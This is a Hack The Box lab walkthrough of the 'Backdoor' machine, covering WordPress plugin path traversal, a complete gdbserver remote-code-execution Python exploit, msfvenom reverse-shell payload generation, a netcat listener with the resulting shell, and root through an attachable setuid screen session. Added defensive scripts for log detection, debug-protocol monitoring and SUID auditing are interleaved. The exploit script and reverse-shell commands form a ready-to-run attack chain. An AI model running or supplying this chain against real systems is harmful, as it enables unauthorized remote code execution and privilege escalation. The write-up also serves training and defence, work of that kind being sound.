Backdoor HTB Write-up| Backdoor hack the box Walkthrough | Backdoor.htb|10.10.11.125| backdoor.htb| Write Up : backdoor HTB
--
Information gathering
First, use nmap for port scanning:
┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -sV -sS -p- 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 02:16 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.14% done
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.20s latency).
Not shown: 65417 closed ports, 115 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/30%OT=22%CT=1%CU=37705%PV=Y%DS=2%DC=T%G=Y%TM=61A5D5
OS:A1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 204.20 ms 10.10.14.1
2 204.33 ms backdoor.htb (10.10.11.125)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1469.77 seconds
You can see from the above that the target runs the WordPress 5.8.1 CMS on port 80, so we use wpscan to enumerate vulnerable plugins.
wpscan output
wpscan --url http://10.10.11.125 --enumerate -Ua
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Tue Nov 30 02:29:55 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a f...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:15 <========================================================================================> (358 / 358) 100.00% Time: 00:00:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:01:50 <======================================================================================> (2575 / 2575) 100.00% Time: 00:01:50

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:06 <=========================================================================================> (137 / 137) 100.00% Time: 00:00:06

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:03 <===============================================================================================> (71 / 71) 100.00% Time: 00:00:03

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:04 <====================================================================================> (100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov 30 02:32:37 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 914.804 KB
[+] Data Received: 18.281 MB
[+] Memory used: 223.848 MB
[+] Elapsed time: 00:02:42
The scan does not reveal much: no plugins or themes were found (without an API token no vulnerability data is shown either), but we do learn that the administrator account is named admin.
Look at the website content
Next, I try to find the directories available on the website, using the Dirb directory search tool.
┌──(root💀kali)-[~]
└─# dirb http://10.10.11.125

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Nov 30 04:11:30 2021
URL_BASE: http://10.10.11.125/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.11.125/ ----
+ http://10.10.11.125/index.php (CODE:301|SIZE:0)
+ http://10.10.11.125/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.11.125/wp-admin/
==> DIRECTORY: http://10.10.11.125/wp-content/
==> DIRECTORY: http://10.10.11.125/wp-includes/
+ http://10.10.11.125/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://10.10.11.125/wp-admin/ ----
+ http://10.10.11.125/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/css/
==> DIRECTORY: http://10.10.11.125/wp-admin/images/
==> DIRECTORY: http://10.10.11.125/wp-admin/includes/
+ http://10.10.11.125/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/js/
==> DIRECTORY: http://10.10.11.125/wp-admin/maint/
==> DIRECTORY: http://10.10.11.125/wp-admin/network/
==> DIRECTORY: http://10.10.11.125/wp-admin/user/

---- Entering directory: http://10.10.11.125/wp-content/ ----
+ http://10.10.11.125/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-content/plugins/
After the directory search I found many directories, so we check each one manually; the interesting one is /wp-content/plugins.
Only readme.txt has content, so open it and take a look.
This confirms that it is a plugin, so let's go to exploit-db and search for vulnerabilities.
We find a Directory Traversal vulnerability.
This is an arbitrary file download vulnerability, so download a configuration file to take a look.
Verify that the vulnerability exists and is exploitable, then try logging in as the admin user with the database password. The admin password turned out to be different from the DB password, so I moved on to enumerating port 1337 to find out which service is running there.
Use the plugin's LFI (Local File Inclusion) to read files that reveal what is listening on port 1337; let's try it.
Just read the /proc/<pid>/cmdline file, where pid is a variable number; according to my testing the range should be between 900 and 1000. The files in /proc give information about running processes.
Start attacking…
Yes, you can see that there is a gdbserver service here. After testing, the service is listening on port 1337 and can be used.
At the same time I found something interesting for Linux privilege escalation.
Note that there is no shell yet, but this already reveals what is running as root.
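From the defender's side, the two reads above (wp-config.php through the plugin's path traversal, then /proc/<pid>/cmdline to fingerprint port 1337) both leave a distinctive trail in the web server's access log. The following is an added example, not part of the original write-up: a small detector that scans Apache combined-format log lines for traversal sequences (plain, URL-encoded and double-encoded) and for reads of wp-config.php, /proc entries or /etc/passwd. The log lines, the plugin path `example-plugin/download.php` and its `file` parameter are all constructed for the example, since the write-up does not name the plugin; the detector does not depend on them.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format. The plugin path and
# the "file" parameter are placeholders; the write-up does not name the plugin.
SAMPLE_LOG = """\
10.10.14.6 - - [30/Nov/2021:04:20:01 +0000] "GET /index.php/feed/ HTTP/1.1" 200 1532 "-" "WPScan v3.8.18"
10.10.14.6 - - [30/Nov/2021:04:21:17 +0000] "GET /wp-content/plugins/example-plugin/download.php?file=../../../wp-config.php HTTP/1.1" 200 3189 "-" "Mozilla/5.0"
10.10.14.6 - - [30/Nov/2021:04:25:40 +0000] "GET /wp-content/plugins/example-plugin/download.php?file=..%2F..%2F..%2F..%2F..%2Fproc%2F962%2Fcmdline HTTP/1.1" 200 74 "-" "Mozilla/5.0"
10.10.14.6 - - [30/Nov/2021:04:25:41 +0000] "GET /wp-content/plugins/example-plugin/download.php?file=....//....//....//etc/passwd HTTP/1.1" 200 2051 "-" "Mozilla/5.0"
192.168.1.20 - - [30/Nov/2021:04:30:02 +0000] "GET /wp-content/themes/twentyseventeen/style.css?ver=20201208 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""

# ip, identd, user, [timestamp], "method target protocol", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Checked on the decoded target, so %2e%2e%2f and ../ match alike.
TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\|\.\.$)')
SENSITIVE_RE = re.compile(r'(?:wp-config\.php|/proc/\d+/cmdline|/etc/passwd)')


def decode_target(target: str) -> str:
    """URL-decode twice so single- and double-encoded sequences both collapse."""
    return unquote(unquote(target))


def classify(line: str):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group('target'))
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append('path-traversal')
    s = SENSITIVE_RE.search(decoded)
    if s:
        reasons.append(f'sensitive-file:{s.group(0)}')
    if not reasons:
        return None
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'target': decoded,
        'status': int(m.group('status')),   # a 200 here means the read succeeded
        'reasons': reasons,
    }


def scan(log_text: str):
    """Scan a block of log lines and return all findings in order."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['ts']} {finding['ip']} {finding['status']} "
              f"{finding['target']} -> {', '.join(finding['reasons'])}")
```

The status code is kept in each finding because a traversal attempt that returns 200 with a non-trivial body size is the one worth paging on; the same request answered with 403 or 404 is noise from a scanner.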
User
Find the RCE exploit for the gdbserver service.
Step 1: First save the exploit locally (change the IP).
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver -> 10.10.11.125:1337
- Attacker's listener -> 10.10.14.6:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''


def checksum(s: str) -> str:
    # GDB remote protocol checksum: byte sum of the packet body modulo 256,
    # sent as exactly two hex digits ('02x' zero-pads values below 0x10;
    # the published script used '2x', which pads with a space instead)
    res = sum(map(ord, s)) % 256
    return f'{res:02x}'


def ack(sock):
    # acknowledge the reply gdbserver just sent
    sock.send(b'+')


def send(sock, s: str) -> str:
    # frame the body as $<body>#<checksum>, read the reply, then ack it
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')

    try:
        # single-step once; the stop reply carries the program counter register
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        exit(1)

    if arch == '10':
        print('[+] Found x64 arch')
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr

    hex_length = hex(len(payload))[2:]

    print('[+] Sending payload')
    # M packet writes the payload at the current program counter; vCont;c resumes it
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')


def main():
    if len(sys.argv) < 3:
        print(help)
        exit(1)

    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]

    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()
Step 2: Use msfvenom to generate the reverse shell payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin
Step 3: Start a netcat listener on port 4444:
nc -nlvp 4444
Step 4: Run the exploit:
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
The shell then connects back to the listener successfully:
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.125] 48584
id
uid=1000(user) gid=1000(user) groups=1000(user)
python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$ cat user.txt
cat user.txt
28171exxxxxxxxxxxxxxxxxdbe
With the user flag obtained, now try for root.
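The exploit above works only because gdbserver's remote serial protocol carries no authentication: whoever can reach port 1337 can single-step the debuggee, write into its memory with an M packet and resume it. As an added example, not from the write-up or from the exploit's author, the following parses a client-to-server byte stream of that protocol, verifies every packet's checksum, and flags memory-write and continue packets, which is the logic a network monitor would run against traffic to an exposed debug port. The captured bytes are constructed for the example (the memory address and the NOP bytes are placeholders), and the framing follows the documented `$<body>#<checksum>` format that the exploit itself uses.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


def rsp_checksum(body: bytes) -> int:
    """Modulo-256 sum of the body bytes, as the GDB remote protocol defines it."""
    return sum(body) % 256


def frame(body: bytes) -> bytes:
    """Wrap a body as $<body>#<two hex digit checksum>."""
    return b'$' + body + b'#' + b'%02x' % rsp_checksum(body)


@dataclass
class Packet:
    body: bytes
    checksum_ok: bool


# '#' inside a body is escaped (0x7d) in the real protocol, so stopping at the
# first '#' is correct for well-formed packets.
PACKET_RE = re.compile(rb'\$([^#]*)#([0-9a-fA-F]{2})')


def parse_stream(data: bytes) -> List[Packet]:
    """Extract $...#xx packets from a byte stream, ignoring the '+'/'-' acks between them."""
    packets = []
    for m in PACKET_RE.finditer(data):
        body, cs = m.group(1), int(m.group(2), 16)
        packets.append(Packet(body, checksum_ok=(cs == rsp_checksum(body))))
    return packets


M_PACKET_RE = re.compile(rb'^M([0-9a-fA-F]+),([0-9a-fA-F]+):([0-9a-fA-F]*)$')
X_PACKET_RE = re.compile(rb'^X([0-9a-fA-F]+),([0-9a-fA-F]+):')


def describe(pkt: Packet) -> Optional[str]:
    """Return an alert string for packets that alter or resume the debuggee, else None."""
    if not pkt.checksum_ok:
        return f'corrupt packet (bad checksum): {pkt.body[:20]!r}'
    m = M_PACKET_RE.match(pkt.body)
    if m:
        return f'memory write of {int(m.group(2), 16)} bytes at 0x{m.group(1).decode()}'
    x = X_PACKET_RE.match(pkt.body)
    if x:
        return f'binary memory write of {int(x.group(2), 16)} bytes at 0x{x.group(1).decode()}'
    if pkt.body.startswith(b'vCont;c') or pkt.body == b'c':
        return 'continue debuggee (executes whatever was written)'
    return None


def alerts(data: bytes) -> List[str]:
    """All alerts for a captured stream, in packet order."""
    return [a for a in map(describe, parse_stream(data)) if a]


# Constructed capture: the exploit's packet sequence (feature query, extended mode,
# single-step, memory write, continue) plus one deliberately corrupted packet.
CAPTURED = (
    b'+' + frame(b'qSupported:multiprocess+;qRelocInsn+;qvCont+;') +
    b'+' + frame(b'!') +
    b'+' + frame(b'vCont;s') +
    b'+' + frame(b'M00005555555551a0,8:9090909090909090') +   # placeholder address/bytes
    b'+' + frame(b'vCont;c') +
    b'$garbage#00'
)

if __name__ == '__main__':
    for a in alerts(CAPTURED):
        print(a)
```

A single M or X packet from an address that is not the developer's own workstation is already a high-confidence signal; the mitigation is simply not to bind gdbserver to a routable interface (bind to 127.0.0.1 or use a local socket and tunnel over SSH).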
Root
find / -perm -4000 -ls 2>/dev/null
ps -ef | grep -i screen
The SUID bit is set on screen, and there is a root-owned screen session named root.
export TERM=xterm
screen -x root/root
Finally, root.
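The root step relies on two conditions at once: a setuid screen binary, and a detached root session that another local user can attach to. As an added example (not part of the write-up), the following audit correlates the output of the two commands above, find / -perm -4000 -ls and ps -ef, reports that combination, and also flags any gdbserver bound to all interfaces, since that was the foothold. The sample command output is constructed; the debuggee path in the gdbserver line is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample output of `find / -perm -4000 -ls 2>/dev/null`
# (inode, blocks, mode, links, owner, group, size, date, path).
FIND_LS_OUTPUT = """\
   131341     88 -rwsr-xr-x   1 root     root        88464 Jul 14  2021 /usr/bin/passwd
   131302     56 -rwsr-xr-x   1 root     root        55528 Jul 14  2021 /usr/bin/mount
   132117    476 -rwsr-xr-x   1 root     root       486056 Feb  3  2020 /usr/bin/screen
   131298    168 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
"""

# Constructed sample `ps -ef` output; /path/to/debuggee is a placeholder.
PS_OUTPUT = """\
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 Nov30 ?        00:00:02 /sbin/init
root         966       1  0 Nov30 ?        00:00:00 SCREEN -dmS root
user         988       1  0 Nov30 ?        00:00:00 gdbserver 0.0.0.0:1337 /path/to/debuggee
user        1234     990  0 02:10 pts/0    00:00:00 bash
"""

SUID_RE = re.compile(
    r'^\s*\d+\s+\d+\s+(?P<mode>\S{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+'
    r'\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)'
)
PS_RE = re.compile(r'^(?P<uid>\S+)\s+(?P<pid>\d+)\s+\d+\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<cmd>.*)$')


def suid_binaries(find_ls: str) -> Dict[str, str]:
    """Map path -> owner for entries whose owner-execute position shows setuid ('s' or 'S')."""
    result = {}
    for line in find_ls.splitlines():
        m = SUID_RE.match(line)
        if m and m.group('mode')[3] in 'sS':
            result[m.group('path')] = m.group('owner')
    return result


def processes(ps: str) -> List[dict]:
    """Parse `ps -ef` rows into dicts; the header row has no numeric PID and is skipped."""
    rows = []
    for line in ps.splitlines():
        m = PS_RE.match(line)
        if m:
            rows.append({'uid': m.group('uid'), 'pid': int(m.group('pid')), 'cmd': m.group('cmd')})
    return rows


def screen_sessions(ps: str) -> List[dict]:
    """Detached screen sessions: a SCREEN process started with -S <name> (or -dmS <name>)."""
    sessions = []
    for p in processes(ps):
        m = re.search(r'\bSCREEN\b.*?\s-\w*S\s+(\S+)', p['cmd'])
        if m:
            sessions.append({'uid': p['uid'], 'pid': p['pid'], 'name': m.group(1)})
    return sessions


def exposed_debuggers(ps: str) -> List[dict]:
    """gdbserver instances bound to all interfaces: unauthenticated code execution for anyone who can reach the port."""
    return [p for p in processes(ps) if 'gdbserver' in p['cmd'] and '0.0.0.0:' in p['cmd']]


def audit(find_ls: str, ps: str) -> List[str]:
    """Correlate the two outputs into human-readable findings."""
    findings = []
    for path, owner in suid_binaries(find_ls).items():
        if path.rsplit('/', 1)[-1] != 'screen':
            continue
        findings.append(f'{path} is setuid {owner}')
        for s in screen_sessions(ps):
            findings.append(f"  screen session '{s['name']}' owned by {s['uid']} (pid {s['pid']}) "
                            f'may be attachable by other local users while {path} is setuid')
    for d in exposed_debuggers(ps):
        findings.append(f"gdbserver listening on all interfaces as {d['uid']} (pid {d['pid']}): {d['cmd']}")
    return findings


if __name__ == '__main__':
    for line in audit(FIND_LS_OUTPUT, PS_OUTPUT):
        print(line)
```

On a real host, feed the script the live output of the two commands; the fix for the first finding is to drop the setuid bit from screen (or install the distribution package, which does not set it) and to keep long-lived root sessions out of multiuser mode.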